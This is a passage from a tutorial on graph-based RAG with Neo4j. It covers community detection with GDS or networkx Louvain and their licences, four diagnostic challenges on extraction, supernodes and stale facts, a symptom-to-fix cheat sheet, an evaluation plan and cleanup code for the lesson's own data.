| Neo4j Graph Data Science, Community Edition | GPLv3 (OpenGDS) | A server plugin; includes all algorithms (Louvain, Leiden, Label Propagation and more), limited to 4 CPU cores |
| GDS Enterprise Edition | Commercial, needs a licence key | Any core count, plus enterprise features |
| Aura Graph Analytics, AuraDS | Managed service | Neo4j-hosted GDS |
networkx.community.louvain_communities in your app |
BSD-3-Clause | Pure Python Louvain, which can return badly connected communities (why GraphRAG uses Leiden: Graph Rag); time it at your graph size |
python-igraph / leidenalg |
GPL / GPL-3.0-or-later | Compiled cores, fast on large graphs |
graspologic-native |
MIT | Rust Leiden; Microsoft's graphrag 3.2.0 depends on it |
The local server has no GDS plugin (CALL gds.version() fails with "There is no procedure with the name gds.version"). With GDS installed, you would project the graph and call gds.leiden.write or gds.louvain.write with a writeProperty. Without it, pull the edges out, cluster them in Python, and write the ids back:
import networkx as nx
records, _, _ = driver.execute_query(
"MATCH (a)-[:HAS_PART|SUPPLIED_BY|COVERS]->(b) RETURN a.name AS a, b.name AS b ORDER BY a, b",
routing_=RoutingControl.READ)
graph = nx.Graph([(r["a"], r["b"]) for r in records])
communities = nx.community.louvain_communities(graph, seed=42)
for i, members in enumerate(communities):
print(i, sorted(members))
driver.execute_query("""
UNWIND $rows AS row
MATCH (e {name: row.name}) WHERE e:Bike OR e:Part OR e:Supplier OR e:Bulletin
SET e.community = row.community""",
rows=[{"name": n, "community": i} for i, members in enumerate(communities) for n in members])
0 ['BC-310', 'BT-4417', 'City 3', 'SB-2026-05', 'SB-2026-07']
1 ['BC-420', 'Cargo 2', 'Kestrel Components']
2 ['Kids 1', 'RB-12']
3 ['BK-7', 'BL-20', 'BT-6250', 'Trail 5']
ORDER BY and seed make the run repeatable; Louvain's result depends on the order it visits nodes. Look at where the recall landed. The recalled caliper BC-310 sits in community 0 with City 3, and Trail 5 is in community 3, with its kit. A tempting optimisation, "only expand within the anchor's community", would have dropped Trail 5 from the recall list. Communities describe density, not your question. Use them for summaries and exploration, not as a relevance filter, unless labeled questions show that the filter costs nothing.
β οΈ Licences matter where you ship. The GPL's conditions attach when you distribute software that includes GPL code, so an on-premises product and a hosted service can face different obligations. Neo4j Community Edition is itself GPLv3, so a product that bundles it already needs that review, and every GPL plugin or library you add is one more item on it. This is not legal advice: record which option you chose, and ask whoever owns licensing before you bundle a GPL component.
Final round: no label on the problem
Real incidents do not say which move they need. Read the symptom, then pick.
Challenge 1: the recall list that shrank
After a switch to a new extraction model, the weekly recall report lists 31 affected bikes instead of the usual 40, and the graph has 20% fewer HAS_PART relationships. The logs show no errors. The new model's output reads well on spot checks.
Check your answer
Move 2. Extraction recall dropped, and it compounds along chains: every missing HAS_PART hides every bike above it in the kit tree. Run the gold set: precision and recall per relationship type for old and new model on the same labeled chunks. Check the issue log for a jump in rejections (a direction or alias change can turn good facts into "pattern not in schema"). Keep the old model until the new one matches it on HAS_PART recall.
Challenge 2: the slow Monday
The p95 latency of the retrieval query rose from 60 ms to 900 ms after a data import. Question volume is unchanged. PROFILE on one slow query shows most database hits in the expansion, below one Part node: a screw used in 12,000 assemblies.
Check your answer
Move 4: a supernode. Stop generic expansion from passing through nodes above a degree limit, cap facts per anchor, and send "what uses this screw?" to a targeted or generated query. Then remeasure p95, database hits and answer-set recall on the labeled relational questions, to check that the cap did not cut facts you need.
Challenge 3: the confident "none"
A dealer asks the assistant, "Which bikes use the BL-20 lever?" It answers, "None of our bikes use the BL-20 lever." The trace shows a generated query using [:CONTAINS], zero rows, no error.
Check your answer
Move 6: an invented relationship type that the query did not validate. Refuse queries whose EXPLAIN warns about unknown labels or types, give the model the schema, and treat zero rows as "could not answer". Add this question to the text-to-Cypher test set with its expected rows (Trail 5, through BK-7), so that a prompt change which brings the problem back fails a test.
Challenge 4: the bike that kept its old brakes
A spec sheet was corrected last week to replace kit BK-7 with BK-9. The assistant still includes that bike in the BC-310 recall. The chunk text in Neo4j shows the corrected sheet.
Check your answer
Move 2: the update wrote the new version and never took back what the old one asserted. Write the new version first, then retract the old one: take its chunk ids out of every fact's sources, delete the facts nobody supports any more, and delete its chunks. Not the other way round, or the recall list has a gap while the new version loads. Test it: after an edit, the old path must be gone and the recall list must change.
Cheat sheet: symptom β move β cost
| Symptom | Move | What it costs | Measure |
|---|---|---|---|
| The answer lives in a link between documents | Property graph: MERGE with constraints, bounded path patterns |
Schema design; queries to write and test | Answers to hand-built gold questions |
| Facts must come from 50,000 chunks | Extraction with a schema; code checks for patterns, names and grounding; sources on facts |
One model call per changed chunk (a cache keyed by text, model, prompt and schema), every chunk again for a new model or prompt; alias tables to curate | Precision and recall per relationship type on a labeled sample |
| A document changed and old answers remain | Ingest the new version, then retract the old one by provenance | Versioned chunk ids; a retract path to build and test | Stale facts after an edit test: must be 0 |
| The question names no entity | Vector index on chunks: SEARCH, dimensions set, cosine or euclidean |
Index memory; binary quantization plus rescoring | ANN recall@k against exact search; retrieval recall on labeled queries |
| Top-k finds the bulletin, not the bikes | Anchor β targeted path query; generic expansion as the fallback | A query per question shape; routing | Answer-set recall and precision; gold facts in the prompt |
| A hub floods context and latency | Degree limit and cap per anchor | Facts reachable only through hubs | p95 latency, database hits, facts per prompt |
| Another tenant's fact reaches the prompt | Tenant filter inside the search, plus a readable-source check on every fact in every expansion query | A lookup per source; permissions kept on chunks | A planted fact from another tenant never appears in answers |
| Counts and lists nobody anticipated | Text-to-Cypher behind an EXPLAIN allow-list, read-only transactions, a timeout and a streamed row cap |
Model calls; refusals; two test sets to maintain | Execution accuracy, refusal rate, empty-result rate; hostile queries still refused |
| "Themes" or grouping | Louvain or Leiden in GDS or in Python | Licence choice; recompute after big changes | Whether summaries or filters help on labeled questions |
Before moving on, take one relational question your current RAG answers badly and write down:
- the relationship patterns it needs;
- the extraction checks that protect them;
- the retrieval query: targeted, generic or generated;
- the fences, if a model writes the query;
- the labeled questions that would prove the graph helped.
How would you measure it on your own data? Collect 100 real questions, label the ones that need relations, and write down the expected answer sets. Run the plain vector pipeline and the graph pipeline side by side. Compare answer-set recall and precision, whether the gold facts reached the prompt, tokens per prompt, p95 latency and cost per 1,000 queries, per question shape. Add extraction precision and recall on 50β100 labeled chunks, and execution accuracy if a model writes queries. Keep the graph for the shapes where it wins by more than it costs. Set precision and recall are defined in Graph Rag, execution accuracy in Vectorless RAG, and the rest in Evaluation & Quality Metrics.
When you are done, remove what the lesson created:
driver.execute_query("DROP INDEX chunk_embedding IF EXISTS")
driver.execute_query("DROP INDEX chunk_doc IF EXISTS")
for name in ["chunk_id", "bike_name", "part_name", "supplier_name", "bulletin_name"]:
driver.execute_query(f"DROP CONSTRAINT {name} IF EXISTS")
driver.execute_query("MATCH (n) WHERE n:Chunk OR n:Bike OR n:Part OR n:Supplier OR n:Bulletin "
"DETACH DELETE n")
driver.close()
Next: Graph Rag for when a graph is worth building and how community reports answer global questions, Vectorless RAG for the same query-writing fences over SQL, Data Pipeline & Indexing for running extraction as a pipeline, and Infrastructure & Security for carrying the user's verified identity to every store the system reads.